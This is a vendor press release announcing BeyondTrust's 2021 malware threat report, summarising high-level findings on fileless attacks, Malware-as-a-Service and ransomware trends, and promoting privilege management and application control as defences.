BeyondTrust releases BeyondTrust Labs Malware Threat Report 2021

BeyondTrust, the worldwide leader in Privileged Access Management, announced the release of the BeyondTrust Labs Malware Threat Report 2021. The research provides insights into threats and privileged account misuse on Windows devices around the world. The report, based on real-world monitoring and analysis of attacks between Q1 2020 and Q1 2021, is produced by the BeyondTrust Labs team with collaboration from customers and incident response teams using BeyondTrust solutions. The report also dives into reoccurring threat themes and maps out tools, techniques, and procedures against the MITRE ATT&CK® Enterprise Framework.

The BeyondTrust Malware Threat Report explored the 58 techniques in the MITRE ATT&ACK Framework lists for Cobalt Strike threat emulation software, using Privilege Management for Windows, against 150 current malware strains.

Key report findings:

  • Absent the right protection, malware will disable endpoint security controls and undermine security investments.
  • The use of native tools to perform fileless attacks in the initial stages of attack is a growing trend, enabling attackers to gain a strong foothold by establishing a persistence mechanism with security controls disabled.
  • The MITRE ATT&CK Framework is effective in distilling a wide range of malware strains and cyberattacks into component techniques, which can then be mitigated.
  • BeyondTrust Privilege Management for Window’s out-of-the-box policies proactively disrupted all 150 different, common attack chains tested.
  • Removal of admin rights and implementation of pragmatic application control are two of the most effective security controls for preventing and mitigating the most common malware threats.

“For decades, enterprises have made significant investments in security solutions in an attempt to strengthen their cyber defenses,” said James Maude, Lead Cybersecurity Researcher at BeyondTrust. “Many of these investments have proven to be ineffective, particularly with changes brought on by the pandemic. Security perimeters have dissolved, creating an exponential growth in attack surfaces, and rendering network monitoring and firewall technologies less effective. Endpoint privilege management solutions enable enterprises to reduce their attack surfaces, while gaining greater control over their digital infrastructure.”

While ransomware has clearly evolved, the fundamental needs to execute code and leverage privileges have largely remained consistent. Whether it’s ransomware hitting a single endpoint, or a sophisticated, tailored attack, the benefits of proactively reducing attack surfaces by removing admin accounts and controlling application execution are highly effective.

Threat actors work ceaselessly to evolve their operations and have matured significantly over the past year. Attackers are exploiting new exposures, using elevation of privilege attacks and sophisticated malware campaigns to take advantage of an enterprise’s often vulnerable front line of defense, their users.

Parallel to legitimate software companies trending towards SaaS, threat actors are shifting to Malware-as-Service (MaaS) with specialists emerging in different areas, including enterprise credential sales, initial access to a target organization, lateral movement capability, and payload delivery. Today, there can be many different pieces of malware that come together in an attack. A ransomware attack can be comprised of multiple threat actors, tools and platforms. And, as threat actors seek to maximize the disruption to organizations and extract the highest ransom payments, the ransomware model is also shifting towards human-driven, enterprise-wide attacks.

There are thousands of malware variants appearing every day and a constant stream of zero-day threats and emergency patches. Defensive tactics that can be employed with BeyondTrust Privilege Management include:

  • Execution and Persistence – Control code and what can execute through allow listing, limiting the attacker’s ability to succeed.
  • Privilege Escalation – Without access to a local administrator or other privileged accounts, the attacker is limited in the systems and data they can access.
  • Defensive Evasion – To evade detection, an attacker needs both the privileges and the ability to execute code to tamper with system settings and security tools.